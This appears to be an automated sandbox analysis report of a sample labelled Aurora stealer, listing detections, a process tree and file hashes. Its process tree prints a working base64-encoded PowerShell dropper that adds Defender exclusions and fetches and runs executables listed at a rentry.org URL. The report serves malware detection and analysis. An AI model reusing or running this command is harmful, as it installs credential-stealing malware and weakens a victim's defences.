Analysis

  • max time kernel
    129s
  • max time network
    187s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-06-2023 07:48

General

  • Target

    https://anonfiles.com/y683map3zf

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://rentry.org/xau9i/raw

Signatures

  • Aurora

    Aurora is a crypto wallet stealer written in Golang.

  • Shurk

    Shurk is an infostealer, written in C++ which appeared in 2021.

  • Shurk Stealer payload 7 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 61 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" "--simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT'" https://anonfiles.com/y683map3zf
    1⤵
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4816
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffbe8e29758,0x7ffbe8e29768,0x7ffbe8e29778
      2⤵
        PID:4784
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1804 --field-trial-handle=1820,i,14797640503534820992,7375402503198811399,131072 /prefetch:2
        2⤵
          PID:5092
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1820,i,14797640503534820992,7375402503198811399,131072 /prefetch:8
          2⤵
            PID:4056
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1340 --field-trial-handle=1820,i,14797640503534820992,7375402503198811399,131072 /prefetch:8
            2⤵
              PID:5048
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3228 --field-trial-handle=1820,i,14797640503534820992,7375402503198811399,131072 /prefetch:1
              2⤵
                PID:560
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3244 --field-trial-handle=1820,i,14797640503534820992,7375402503198811399,131072 /prefetch:1
                2⤵
                  PID:3264
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=5004 --field-trial-handle=1820,i,14797640503534820992,7375402503198811399,131072 /prefetch:1
                  2⤵
                    PID:1632
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5308 --field-trial-handle=1820,i,14797640503534820992,7375402503198811399,131072 /prefetch:8
                    2⤵
                      PID:4600
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5392 --field-trial-handle=1820,i,14797640503534820992,7375402503198811399,131072 /prefetch:8
                      2⤵
                        PID:644
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5336 --field-trial-handle=1820,i,14797640503534820992,7375402503198811399,131072 /prefetch:8
                        2⤵
                          PID:1152
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5160 --field-trial-handle=1820,i,14797640503534820992,7375402503198811399,131072 /prefetch:8
                          2⤵
                            PID:3520
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5244 --field-trial-handle=1820,i,14797640503534820992,7375402503198811399,131072 /prefetch:8
                            2⤵
                              PID:4580
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5256 --field-trial-handle=1820,i,14797640503534820992,7375402503198811399,131072 /prefetch:8
                              2⤵
                                PID:4828
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5460 --field-trial-handle=1820,i,14797640503534820992,7375402503198811399,131072 /prefetch:8
                                2⤵
                                  PID:4252
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=5572 --field-trial-handle=1820,i,14797640503534820992,7375402503198811399,131072 /prefetch:1
                                  2⤵
                                    PID:4372
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=5520 --field-trial-handle=1820,i,14797640503534820992,7375402503198811399,131072 /prefetch:1
                                    2⤵
                                      PID:3908
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=5100 --field-trial-handle=1820,i,14797640503534820992,7375402503198811399,131072 /prefetch:1
                                      2⤵
                                        PID:656
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1784 --field-trial-handle=1820,i,14797640503534820992,7375402503198811399,131072 /prefetch:8
                                        2⤵
                                          PID:2148
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4924 --field-trial-handle=1820,i,14797640503534820992,7375402503198811399,131072 /prefetch:8
                                          2⤵
                                            PID:1344
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4756 --field-trial-handle=1820,i,14797640503534820992,7375402503198811399,131072 /prefetch:2
                                            2⤵
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:1996
                                        • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                          "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                          1⤵
                                            PID:4712
                                          • C:\Windows\System32\rundll32.exe
                                            C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                            1⤵
                                              PID:2508
                                            • C:\Program Files\7-Zip\7zFM.exe
                                              "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\AURORA_STEALER.rar"
                                              1⤵
                                              • Suspicious use of FindShellTrayWindow
                                              PID:3684
                                            • C:\Program Files\7-Zip\7zFM.exe
                                              "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\AURORA_STEALER\AURORA_STEALER.exe"
                                              1⤵
                                              • Suspicious use of FindShellTrayWindow
                                              PID:2344
                                            • C:\Users\Admin\Downloads\AURORA_STEALER\Aurora.exe
                                              "C:\Users\Admin\Downloads\AURORA_STEALER\Aurora.exe"
                                              1⤵
                                              • Checks computer location settings
                                              • Executes dropped EXE
                                              PID:1588
                                              • C:\Users\Admin\AppData\Local\Temp\Aurora.exe
                                                "C:\Users\Admin\AppData\Local\Temp\Aurora.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                PID:3404
                                              • C:\Users\Admin\AppData\Local\Temp\LX.exe
                                                "C:\Users\Admin\AppData\Local\Temp\LX.exe"
                                                2⤵
                                                • Checks computer location settings
                                                • Executes dropped EXE
                                                PID:3760
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAZgBsACMAPgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAcABvAHcAZQByAHMAaABlAGwAbAAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAIgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGMAZgBnACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAHAAbQBtACMAPgA7ACIAOwA8ACMAcwBxAGwAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBiAGcAaQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB0AGgAZwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBmAHgAYQAjAD4AOwAkAHcAYwAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQA7ACQAbABuAGsAIAA9ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGUAbgB0AHIAeQAuAG8AcgBnAC8AeABhAHUAOQBpAC8AcgBhAHcAJwApAC4AUwBwAGwAaQB0ACgAWwBzAHQAcgBpAG4AZwBbAF0AXQAiAGAAcgBgAG4AIgAsACAAWwBTAHQAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwBdADoAOgBOAG8AbgBlACkAOwAgACQAZgBuACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBQAGEAdABoAF0AOgA6AEcAZQB0AFIAYQBuAGQAbwBtAEYAaQBsAGUATgBhAG0AZQAoACkAOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAGwAbgBrAFsAJABpAF0ALAAgADwAIwBqAHoAdwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHcAbgBzACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGUAdQBpACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACkAIAB9ADwAIwBtAGIAZQAjAD4AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAbABuAGsALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAKwApACAAewAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB3AHkAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAegBiAGIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAIAB9ACAAPAAjAGgAaQBsACMAPgA="
                                                  3⤵
                                                  • Blocklisted process makes network request
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:4340
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#cfg#>[System.Windows.Forms.MessageBox]::Show('','','OK','Error')<#pmm#>;
                                                    4⤵
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:2596

                                            Network

                                            MITRE ATT&CK Enterprise v6

                                            Replay Monitor

                                            Loading Replay Monitor...

                                            Downloads

                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

                                              Filesize

                                              240B

                                              MD5

                                              f973eab9c021538d21c16ce3f04290fa

                                              SHA1

                                              9c3a5f60694fcc39ce00bba43e7ed18749373551

                                              SHA256

                                              22d367b590e309a2a519a0292845450ad13bcaf78a5ba52445f632e2d1a7d386

                                              SHA512

                                              e7a1c9961d3c5d78c60c4e4bd6559e0c511fda7eca7b8c291e95e5eaa64f2ef7a8c7193684a8103448a161941bddf6ed1914f34ce66c12736e00d18210223b4b

                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\en_CA\messages.json

                                              Filesize

                                              851B

                                              MD5

                                              07ffbe5f24ca348723ff8c6c488abfb8

                                              SHA1

                                              6dc2851e39b2ee38f88cf5c35a90171dbea5b690

                                              SHA256

                                              6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c

                                              SHA512

                                              7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\dasherSettingSchema.json

                                              Filesize

                                              854B

                                              MD5

                                              4ec1df2da46182103d2ffc3b92d20ca5

                                              SHA1

                                              fb9d1ba3710cf31a87165317c6edc110e98994ce

                                              SHA256

                                              6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

                                              SHA512

                                              939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

                                              Filesize

                                              3KB

                                              MD5

                                              8a9041b2c80e814ce78e2cefb6a398af

                                              SHA1

                                              ddb3317d8d976911c16f6147a7b7e4c3fc23f034

                                              SHA256

                                              7da61f39c516bb9baa3dc0b62790d99f83b080b2865389d15452a2b8d12629d3

                                              SHA512

                                              9902ae7bc55e7c263d30d96759ccd8a9d07754fdbffbe311648556d08d7d9b1828d82db7f566e808a03de4cef036c2656b6a1e8de4e4a07486bcdaea65f3e54c

                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                              Filesize

                                              872B

                                              MD5

                                              0eb696d656d98cef809de7d1b9c47ecb

                                              SHA1

                                              6af3b0b07001e38160c2841b8ffa353227d1b7cd

                                              SHA256

                                              b900efff953bdf0f21fdc4c2f956e641eef524677ded1ba381d439c5c1360672

                                              SHA512

                                              88004e833f10e5d9034bd008cb3e4603cf798ac3f28ab588a032653322d071759d6ba0c6f31d0a6d0b2bfde9566628799b4cdd98f0b28802296b4f2aed240dba

                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                              Filesize

                                              537B

                                              MD5

                                              67e90d05f28f5797e69ec137c3437663

                                              SHA1

                                              30bfcc7165838913050731534f4514f82c786d8b

                                              SHA256

                                              311b539498d56d41a50d42787a6ac6a3a5333e2dde06b7980c0d168213900e4a

                                              SHA512

                                              3f36919d35efca6bc1c4c8e8f96694be61534195fc89f12145efcdcbcbf764ad348314b8880bf0a399532689d58688f081af490489feb723ddcbd92f42e8b085

                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                              Filesize

                                              7KB

                                              MD5

                                              7efa3a59bea32cbfcbd7c729ca004863

                                              SHA1

                                              d8fd7054bfaa0019a67652406354594978898739

                                              SHA256

                                              28cd566ae04a576ee22f7032649f220a0475368357ee2c9d603b11d37e5b52d6

                                              SHA512

                                              0e790130edc06ef9f9493e50cdbdba674eb40a496f7b5875e2b1cc820090c566fbcc9861958b2329b2ec6b5b14b718232be0a0e2ad6c3db09a5f1851a240c2fa

                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                              Filesize

                                              6KB

                                              MD5

                                              90f7febe30b06ac8df1a0cbadf0a3208

                                              SHA1

                                              5548e366bac17453ddc7a4c17675807b00c64ece

                                              SHA256

                                              00edb63024238bfb9d995d90144089a6a316a07d8e03fbd0625a99cccce9f06b

                                              SHA512

                                              2d958a8aee41bf4b5bab03c0e6b324bdd4db383e5ed325b625db125fce199038352038cbac39dac9454aadecd2671b53a4eea1a47a8d3fdd22dfca8163e1acd7

                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                              Filesize

                                              7KB

                                              MD5

                                              9e9b373c7915ab0a8ce44f27083cb9b3

                                              SHA1

                                              0dcf75bf95739d55cf65cad9988625ccadb74083

                                              SHA256

                                              5c32baa1773c81ffda662fccf6cf3d40aef88257ae3cb2a9237e7f4cf1d8ebb6

                                              SHA512

                                              f2ce2ca526c8eaf46030e8e97f96378d25e28c4c2eb46f37a3abbe239e0a295da3cbc727319177b28a165eb798b138a5495992f0e6e277b27deaf35b43c11312

                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                              Filesize

                                              15KB

                                              MD5

                                              4f0270e71cb1778bf341d70a7a0aa0c0

                                              SHA1

                                              e01d5569f4f0307cac802ac3a7fe6dcfc4420267

                                              SHA256

                                              9dac1a832a58783fea2b137524ab7336ef889266c2a834f23650eecf898de1ab

                                              SHA512

                                              b237d6673a5699399229d40d0980990ac5c1dc48c74d4ce9b902f94dcda855ff98078160e6d8d659634443ec8d8741ef3a307a8c743bb11e60d5f3ea974927b1

                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\CURRENT

                                              Filesize

                                              16B

                                              MD5

                                              46295cac801e5d4857d09837238a6394

                                              SHA1

                                              44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                              SHA256

                                              0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                              SHA512

                                              8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

                                              Filesize

                                              96B

                                              MD5

                                              3a3a4c531c9150ef07419ef23e62979e

                                              SHA1

                                              c95384ea614711faff355ef9b7a26022974c5e84

                                              SHA256

                                              364ec659cc5b776c8d0b797c94dc2122cf117eddae6e3867320bde82e415978e

                                              SHA512

                                              7faca21b523bd67b4197e2a8c8b43bf370e29e062cddaae10ba68ff9ca65179adad8bd5cc8b9f481b0c6eacf5a654a8164bcc527c03d633fb98550631163360e

                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe56ce9f.TMP

                                              Filesize

                                              48B

                                              MD5

                                              bc7d802f7ab3f8ff65273ec09326e1f6

                                              SHA1

                                              8763af73cd87880c7ddaaa0455ca0115d25d9bfd

                                              SHA256

                                              cead0a253f7b26500058f0928b336c5d9b18602792305a62b52679f7ed7bfc2b

                                              SHA512

                                              3929f7712140b2f74492cff501c8f591182e09e11b85f97c39bd4a7b3cc4cf36d8af825991d2fc595b5cb7d5a905888f7ff3b8ced37d0c3f070ad7d833a5bec7

                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                              Filesize

                                              157KB

                                              MD5

                                              ea13d94431fe3a4cee6a924d186f7b27

                                              SHA1

                                              2320e4326e97a378807383d56ea7a644127779c9

                                              SHA256

                                              021ecd9c27959dcd0bc04feb98012b54d001fe1a066a57d27d50c14ad4c21973

                                              SHA512

                                              a16b77e333809e8ce73b88608bafe9876521d588a5dc13503b92ca09e837439015bf71b13f4c89a083d8a7ba484d45bb8709234c90fd4108d4293f13335bafa8

                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

                                              Filesize

                                              106KB

                                              MD5

                                              224e9989f160b05de05970372e66eced

                                              SHA1

                                              1a91a61f3591dece7b414a6119d16404143f246f

                                              SHA256

                                              b8f3e621b4d3bff324588f4700e4e463c350019699deb7370aaa6a4d7c57c221

                                              SHA512

                                              3d5db1f4aa6f791e53df7b88d1174e5ee89f6b6c27d7b246c350f535dc341636551773a4207e19c5d193b60caf0d3236b23dee2fc6bd3565b1984a9674c7e164

                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe572b27.TMP

                                              Filesize

                                              101KB

                                              MD5

                                              5415c6fbddca0454ecc65b729d08531d

                                              SHA1

                                              fc62435c2780e161addeb1de52359667c0646e29

                                              SHA256

                                              966354a059c94d9ac4b8648113bcd0c3e0db22b38d2c6f2758bc0d09ccb17bbc

                                              SHA512

                                              c9f5114c84fb41e6e516765c7524fe883210d0277ce6b2d7a56feec192c9bd24bc6caf6cea52f01af225c6a3f0716f7ee3ca413474e47dbcffac02b2514f9508

                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\fac08534-e35a-46d5-8789-ac4f5db6e7ce.tmp

                                              Filesize

                                              157KB

                                              MD5

                                              11ec4237c38818d9ad1c5fe9f8c402e2

                                              SHA1

                                              61262f74f7c21fd161a349e3669bd69b7af02174

                                              SHA256

                                              314e5bb15437afad1e015e93a704741d1e62a5f01551302fa071c8e4ff10a188

                                              SHA512

                                              67c78b3f2f8340eb2d548a6abb9bd48dbec6f26259bb90dd0c609a87ee92d60a6c835d38cf5ca20afa016247e3a96eca6c23447cb6bfe7b5619ef470b19fc3a1

                                            • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

                                              Filesize

                                              2B

                                              MD5

                                              99914b932bd37a50b983c5e7c90ae93b

                                              SHA1

                                              bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

                                              SHA256

                                              44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

                                              SHA512

                                              27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

                                            • C:\Users\Admin\AppData\Local\Temp\Aurora.exe

                                              Filesize

                                              25.4MB

                                              MD5

                                              ad9aa927339dc830a38021afbe20a85f

                                              SHA1

                                              8017bea5f073064a27f61390ce6433cc110f55ea

                                              SHA256

                                              6815733e84bc19b0e7d24533f6295c929cd48be501b226e3a9fd12806a7a4e71

                                              SHA512

                                              43d95d09404f4407083f25ac59f9c31855ed715309037be6ba9e05d26af3ee073e786ee2d12f72f3e1fedebf8529c8b31dc2b7e485ab08b7e21fce2abcf260fd

                                            • C:\Users\Admin\AppData\Local\Temp\Aurora.exe

                                              Filesize

                                              25.4MB

                                              MD5

                                              ad9aa927339dc830a38021afbe20a85f

                                              SHA1

                                              8017bea5f073064a27f61390ce6433cc110f55ea

                                              SHA256

                                              6815733e84bc19b0e7d24533f6295c929cd48be501b226e3a9fd12806a7a4e71

                                              SHA512

                                              43d95d09404f4407083f25ac59f9c31855ed715309037be6ba9e05d26af3ee073e786ee2d12f72f3e1fedebf8529c8b31dc2b7e485ab08b7e21fce2abcf260fd

                                            • C:\Users\Admin\AppData\Local\Temp\Aurora.exe

                                              Filesize

                                              25.4MB

                                              MD5

                                              ad9aa927339dc830a38021afbe20a85f

                                              SHA1

                                              8017bea5f073064a27f61390ce6433cc110f55ea

                                              SHA256

                                              6815733e84bc19b0e7d24533f6295c929cd48be501b226e3a9fd12806a7a4e71

                                              SHA512

                                              43d95d09404f4407083f25ac59f9c31855ed715309037be6ba9e05d26af3ee073e786ee2d12f72f3e1fedebf8529c8b31dc2b7e485ab08b7e21fce2abcf260fd

                                            • C:\Users\Admin\AppData\Local\Temp\LX.exe

                                              Filesize

                                              74KB

                                              MD5

                                              1ab3092297d1806397e8d3a6747a3271

                                              SHA1

                                              ea114a2e5ddee915d30458031ec5ced7f97d1650

                                              SHA256

                                              2aa5d3e3abdcd8d31a11b9e1ac3d2e4b4075261f2e324833da229e3736a3ee6e

                                              SHA512

                                              1ab9ea47bbeb22688ba8ebcdbad144b794aabd29f1d4b0bfc2554cc1e9b28325e31b07e252b96ccd3851e49f9cdf935ded702a1cf83c343d69e357e4734caf28

                                            • C:\Users\Admin\AppData\Local\Temp\LX.exe

                                              Filesize

                                              74KB

                                              MD5

